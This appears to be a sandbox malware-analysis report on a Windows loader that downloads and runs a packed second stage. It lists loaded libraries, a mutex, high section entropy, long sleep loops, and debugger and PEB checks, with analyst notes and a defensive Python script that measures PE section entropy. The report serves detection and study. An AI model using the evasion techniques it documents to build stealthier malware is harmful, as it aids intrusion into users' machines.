                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: 0_2_00B0A2CE CreateToolhelp32Snapshot,Module32First, 0_2_00B0A2CE
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 3_2_004361E0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString, 3_2_004361E0
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\track_prt[1].htm
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Mutant created: \Sessions\1\BaseNamedObjects\5rjtejk5rytrr
                  Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7968
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | File created: C:\Users\user\AppData\Local\Temp\91B1.tmp
                  Source: hpEAJnNwCB.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | File read: C:\Users\user\Desktop\desktop.ini
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: hpEAJnNwCB.exe | Virustotal: Detection: 40%
                  Source: hpEAJnNwCB.exe | ReversingLabs: Detection: 44%
                  Source: unknown | Process created: C:\Users\user\Desktop\hpEAJnNwCB.exe "C:\Users\user\Desktop\hpEAJnNwCB.exe"
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Process created: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe "C:\Users\user\AppData\Local\Temp\91B1.tmp.exe"
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7968 -s 860
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Process created: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe "C:\Users\user\AppData\Local\Temp\91B1.tmp.exe"
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Section loaded: apphelp.dll
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Section loaded: msimg32.dll
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Section loaded: wininet.dll
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Section loaded: msvcr100.dll
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Section loaded: iertutil.dll
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Section loaded: sspicli.dll
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Section loaded: windows.storage.dll
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Section loaded: wldp.dll
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Section loaded: profapi.dll
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Section loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Section loaded: winhttp.dll
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Section loaded: mswsock.dll
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Section loaded: iphlpapi.dll
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Section loaded: winnsi.dll
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Section loaded: urlmon.dll
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Section loaded: srvcli.dll
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Section loaded: netutils.dll
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Section loaded: dnsapi.dll
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Section loaded: rasadhlp.dll
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Section loaded: fwpuclnt.dll
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Section loaded: schannel.dll
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Section loaded: mskeyprotect.dll
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Section loaded: ntasn1.dll
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Section loaded: msasn1.dll
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Section loaded: dpapi.dll
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Section loaded: cryptsp.dll
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Section loaded: rsaenh.dll
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Section loaded: cryptbase.dll
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Section loaded: gpapi.dll
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Section loaded: ncrypt.dll
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Section loaded: ncryptsslp.dll
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Section loaded: uxtheme.dll
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Section loaded: propsys.dll
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Section loaded: windows.staterepositoryps.dll
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Section loaded: edputil.dll
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Section loaded: wintypes.dll
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Section loaded: appresolver.dll
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Section loaded: bcp47langs.dll
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Section loaded: slc.dll
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Section loaded: userenv.dll
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Section loaded: sppc.dll
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Section loaded: onecorecommonproxystub.dll
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Section loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Section loaded: pcacli.dll
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Section loaded: mpr.dll
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Section loaded: sfc_os.dll
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Section loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Section loaded: msimg32.dll
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Section loaded: msvcr100.dll
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Section loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Section loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Section loaded: winhttp.dll
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Section loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Section loaded: webio.dll
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Section loaded: mswsock.dll
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Section loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Section loaded: winnsi.dll
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Section loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Section loaded: dnsapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Section loaded: rasadhlp.dll
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Section loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Section loaded: fwpuclnt.dll
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Section loaded: schannel.dll
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Section loaded: mskeyprotect.dll
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Section loaded: ntasn1.dll
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Section loaded: ncrypt.dll
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Section loaded: ncryptsslp.dll
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Section loaded: msasn1.dll
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Section loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Section loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Section loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Section loaded: gpapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Section loaded: dpapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Section loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Section loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Section loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll

Data Obfuscation

Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Unpacked PE file: 3.2.91B1.tmp.exe.400000.0.unpack | section rights: .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.CRT:R;.reloc:R;
Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Unpacked PE file: 0.2.hpEAJnNwCB.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Unpacked PE file: 3.2.91B1.tmp.exe.400000.0.unpack
Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: 0_2_0041EC5E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_0041EC5E
Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: 0_2_00410766 push ecx; ret 0_2_00410779
Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: 0_2_0040FD8C push ecx; ret 0_2_0040FD9F
Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: 0_2_00B0B11A push es; iretd 0_2_00B0B12B
Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: 0_2_00B0F4D2 pushad ; ret 0_2_00B0F4EE
Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: 0_2_00B0F650 push ecx; ret 0_2_00B0F66D
Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: 0_2_00B0CA24 pushad ; ret 0_2_00B0CA4C
Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: 0_2_00B0CEC5 push 00000003h; ret 0_2_00B0CEC9
Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: 0_2_024A09CD push ecx; ret 0_2_024A09E0
Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: 0_2_024C799F push esp; retf 0_2_024C79A7
Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: 0_2_024ACE18 push ss; retf 0_2_024ACE1D
Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: 0_2_0249FFF3 push ecx; ret 0_2_024A0006
Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: 0_2_024C7F9D push esp; retf 0_2_024C7F9E
Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: 0_2_024C9DE8 pushad ; retf 0_2_024C9DEF
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 3_2_0041ACF6 push esp; iretd 3_2_0041ACFF
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 3_2_0043F6EE push esp; iretd 3_2_0043F6EF
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 3_2_0043BF00 push eax; mov dword ptr [esp], 49484716h 3_2_0043BF01
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 3_2_00901221 push ebx; retf 5C2Ch 3_2_0090124B
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 3_2_008FBBAD pushad ; ret 3_2_008FBBB2
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 3_2_008FBE33 push ebp; ret 3_2_008FBE38
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 3_2_024CC167 push eax; mov dword ptr [esp], 49484716h 3_2_024CC168
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 3_2_024CF555 push esp; iretd 3_2_024CF556
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 3_2_024AAF5D push esp; iretd 3_2_024AAF66
Source: hpEAJnNwCB.exe | Static PE information: section name: .text entropy: 7.543282648713042
Source: ScreenUpdateSync[1].exe.0.dr | Static PE information: section name: .text entropy: 7.376376674331909
Source: 91B1.tmp.exe.0.dr | Static PE information: section name: .text entropy: 7.376376674331909
Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | File created: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe (dropped file)
Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\ScreenUpdateSync[1].exe (dropped file)
Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: 0_2_0040E974 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_0040E974

Note on the dropped files: ScreenUpdateSync[1].exe sits in the Internet Explorer cache (INetCache), which means hpEAJnNwCB.exe fetched it through WinINet/urlmon rather than through raw sockets, and its .text entropy is identical to that of 91B1.tmp.exe down to the last digit, so the Temp file is the same download copied out of the cache before being executed. A .text entropy above 7.3 bits per byte in both the loader and the payload is what the "Software Packing" entries in the matrix below are based on; compiled code that has not been packed or encrypted normally sits well below 7.
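The two measurements this section relies on, per-section entropy (the report's ".text entropy: 7.54") and per-section rights (the report's ".text:ER;.rdata:R;..." notation), are easy to reproduce without the sandbox. The script below is an added example, not part of the Joe Sandbox report and not the sample's code: it parses the COFF section table of a PE file by hand (no third-party library), computes the Shannon entropy of each section's raw data, renders the rights in the report's E/R/W style, and diffs two section maps the way the "Unpacked PE file" line above compares them. The 7.0 bits-per-byte cut-off is an assumption (a common triage rule of thumb), not a value from the report, and the PE image it analyses is constructed inside the script.

```python
"""Section-entropy and section-rights triage for a PE file (added example, not from the report)."""
import math
import struct

PACKED_ENTROPY_THRESHOLD = 7.0  # assumption: usual rule of thumb for "probably packed or encrypted"

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant buffer, 8.0 for uniformly distributed bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def section_rights(characteristics: int) -> str:
    """Render the IMAGE_SCN_MEM_* bits the way the report does (E, R, W)."""
    flags = ((IMAGE_SCN_MEM_EXECUTE, "E"), (IMAGE_SCN_MEM_READ, "R"), (IMAGE_SCN_MEM_WRITE, "W"))
    return "".join(letter for bit, letter in flags if characteristics & bit)


def pe_sections(image: bytes) -> list:
    """Walk the section table and return name, rights and raw-data entropy for every section."""
    if image[:2] != b"MZ":
        raise ValueError("not a PE file: missing MZ header")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file: missing PE signature")
    number_of_sections = struct.unpack_from("<H", image, e_lfanew + 6)[0]
    size_of_optional_header = struct.unpack_from("<H", image, e_lfanew + 20)[0]
    table = e_lfanew + 24 + size_of_optional_header  # section headers follow the optional header
    sections = []
    for i in range(number_of_sections):
        off = table + 40 * i  # IMAGE_SECTION_HEADER is 40 bytes
        name, _vsize, _va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", image, off)
        characteristics = struct.unpack_from("<I", image, off + 36)[0]
        entropy = shannon_entropy(image[raw_ptr:raw_ptr + raw_size])
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "rights": section_rights(characteristics),
            "entropy": round(entropy, 3),
            "likely_packed": entropy >= PACKED_ENTROPY_THRESHOLD,
        })
    return sections


def rights_diff(before: dict, after: dict) -> dict:
    """Compare two {section: rights} maps, as in the report's 'A vs B' unpacking line."""
    return {
        "added": sorted(set(after) - set(before)),
        "removed": sorted(set(before) - set(after)),
        "changed": {n: (before[n], after[n]) for n in before if n in after and before[n] != after[n]},
    }


def build_test_pe(sections) -> bytes:
    """Construct a minimal, non-executable PE image for the demo (constructed data, not a real sample)."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0, 0x102)  # no optional header
    raw_ptr = e_lfanew + len(coff) + 40 * len(sections)
    table, payload = b"", b""
    for name, characteristics, body in sections:
        table += struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\0"), len(body), 0x1000,
                             len(body), raw_ptr, 0, 0, 0, 0, characteristics)
        payload += body
        raw_ptr += len(body)
    return dos + coff + table + payload


def demo() -> list:
    """Analyse a constructed two-section image: uniform bytes (8.0 bits) next to zero fill (0.0 bits)."""
    image = build_test_pe([
        (b".text", IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ, bytes(range(256)) * 16),
        (b".data", IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE, b"\0" * 4096),
    ])
    return pe_sections(image)


if __name__ == "__main__":
    for s in demo():  # replace demo() with pe_sections(open(path, "rb").read()) for a real file
        print(f"{s['name']:<8} {s['rights']:<3} entropy={s['entropy']:.3f} packed={s['likely_packed']}")
    print(rights_diff({".text": "ER", ".rdata": "R", ".data": "W", ".rsrc": "R"},
                      {".text": "ER", ".rdata": "R", ".data": "W", ".CRT": "R", ".reloc": "R"}))
```

Running `pe_sections` over hpEAJnNwCB.exe and 91B1.tmp.exe should give the .text values the report prints; the `rights_diff` call in the demo reproduces the section comparison from the "Unpacked PE file" line (the .rsrc section of one layout is absent from the other, which gains .CRT and .reloc).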
Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Process information set: NOOPENFILEERRORBOX (2 identical entries collapsed)
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS|NOGPFAULTERRORBOX (5 identical entries collapsed)
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX (50 identical entries collapsed)

Note: the AuthRoot change notifications are registered by crypt32 as a side effect of certificate-chain validation and appear in any process that performs a TLS handshake; they are not something the sample asks for. WerFault.exe is Windows Error Reporting, started by the OS when a process faults, and the SetErrorMode entries attributed to it are WER's own behaviour; their only significance for the sample is that a process faulted during the run.
Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Window / User API: threadDelayed 390
Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Window / User API: threadDelayed 9598
Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Evasive API call chain: GetSystemTimeAsFileTime, DecisionNodes (graph_0-65068)
Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | API coverage: 5.1 %
Source: C:\Users\user\Desktop\hpEAJnNwCB.exe TID: 7948 | Thread sleep count: 390 > 30
Source: C:\Users\user\Desktop\hpEAJnNwCB.exe TID: 7948 | Thread sleep time: -281580s >= -30000s
Source: C:\Users\user\Desktop\hpEAJnNwCB.exe TID: 7948 | Thread sleep count: 9598 > 30
Source: C:\Users\user\Desktop\hpEAJnNwCB.exe TID: 7948 | Thread sleep time: -6929756s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe TID: 8036 | Thread sleep time: -120000s >= -30000s
Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Last function: Thread delayed (2 identical entries collapsed)
Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: 0_2_004389F2 FindFirstFileExW, 0_2_004389F2
Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: 0_2_024C8C59 FindFirstFileExW, 0_2_024C8C59

Note: an API coverage of 5.1 % means the run exercised only a small part of the sample's code. Long delay loops such as the 9598 sleeps on TID 7948 are the usual cause, so the behavioural findings above are a lower bound; a longer run, or one with sleep skipping enabled, may show more.
Source: Amcache.hve.7.dr | Binary or memory string: VMware
Source: Amcache.hve.7.dr | Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.7.dr | Binary or memory string: vmci.syshbin
Source: Amcache.hve.7.dr | Binary or memory string: VMware, Inc.
Source: Amcache.hve.7.dr | Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.7.dr | Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.7.dr | Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.7.dr | Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: hpEAJnNwCB.exe, 00000000.00000002.3745614627.0000000000B69000.00000004.00000020.00020000.00000000.sdmp, hpEAJnNwCB.exe, 00000000.00000003.3613575394.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, hpEAJnNwCB.exe, 00000000.00000003.3613575394.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, hpEAJnNwCB.exe, 00000000.00000002.3745614627.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, 91B1.tmp.exe, 00000003.00000003.1471777878.000000000097A000.00000004.00000020.00020000.00000000.sdmp, 91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmp, 91B1.tmp.exe, 00000003.00000002.1759214723.0000000000936000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: Amcache.hve.7.dr | Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.7.dr | Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.7.dr | Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.7.dr | Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: hpEAJnNwCB.exe, 00000000.00000003.3613575394.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, hpEAJnNwCB.exe, 00000000.00000002.3745614627.0000000000B98000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWc
Source: Amcache.hve.7.dr | Binary or memory string: vmci.sys
Source: Amcache.hve.7.dr | Binary or memory string: vmci.syshbin`
Source: Amcache.hve.7.dr | Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.7.dr | Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.7.dr | Binary or memory string: VMware-42 27 ae 88 8c 2b 21 02-a5 86 22 5b 84 51 ac f0
Source: Amcache.hve.7.dr | Binary or memory string: VMware20,1
Source: Amcache.hve.7.dr | Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.7.dr | Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.7.dr | Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.7.dr | Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.7.dr | Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.7.dr | Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.7.dr | Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.7.dr | Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.7.dr | Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.7.dr | Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.7.dr | Binary or memory string: vmci.inf_amd64_68ed49469341f563

Note: Amcache.hve.7.dr is the analysis VM's own application-compatibility hive, written by Windows, so the VMware and Hyper-V strings found in it describe the sandbox hardware and say nothing about what the sample looks for. The one string that is in the sample's own memory, "Hyper-V RAW", is the name of the Winsock AF_HYPERV protocol provider present in the catalog of every Windows 10 installation and is expected in any process that initialises Winsock (mswsock.dll is loaded above); on its own it is not evidence of VM detection.
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 3_2_0043A9B0 LdrInitializeThunk, 3_2_0043A9B0
Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: 0_2_0042A3D3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0042A3D3
Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: 0_2_0041EC5E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_0041EC5E
Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: 0_2_0042FE5F mov eax, dword ptr fs:[00000030h] 0_2_0042FE5F
Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: 0_2_00B09BAB push dword ptr fs:[00000030h] 0_2_00B09BAB
Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: 0_2_024C00C6 mov eax, dword ptr fs:[00000030h] 0_2_024C00C6
Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: 0_2_0249092B mov eax, dword ptr fs:[00000030h] 0_2_0249092B
Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: 0_2_02490D90 mov eax, dword ptr fs:[00000030h] 0_2_02490D90
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 3_2_008F8A3B push dword ptr fs:[00000030h] 3_2_008F8A3B
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 3_2_0249092B mov eax, dword ptr fs:[00000030h] 3_2_0249092B
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 3_2_02490D90 mov eax, dword ptr fs:[00000030h] 3_2_02490D90
Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: 0_2_0043BBC1 GetProcessHeap, 0_2_0043BBC1
Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: 0_2_0042A3D3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0042A3D3
